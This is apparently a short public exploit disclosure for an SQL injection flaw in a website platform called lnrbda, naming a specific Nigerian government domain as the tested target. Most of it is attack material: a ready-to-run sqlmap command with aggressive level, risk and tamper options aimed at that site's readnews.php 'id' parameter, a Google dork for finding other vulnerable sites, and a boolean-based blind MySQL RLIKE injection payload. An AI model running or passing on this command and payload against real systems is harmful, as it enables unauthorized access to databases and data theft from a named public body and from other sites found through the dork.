**************************** #Exploit Title: lnrbda - SQL Injection vulnerability #Date: 2024-06-20 #Exploit Author: Mahdi Karimi #Vendor Homepage: http://www.lnrbda.gov.ng #Google Dork: "Powered by lnrbda" #Tested On: Kali Linux sqlmap: sqlmap -u "http://www.lnrbda.gov.ng/readnews.php?id=1" -p id --level=5 --risk=3 --tamper=space2comment --random-agent Testing Method; - boolean-based blind Parameter: id (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: id=1' RLIKE (SELECT (CASE WHEN (3693=3693) THEN 1 ELSE 0x28 END)) AND 'lQiz'='lQiz --- ************************************************** #Discovered by: Mahdi Karimi #Email : [email protected] **************************************************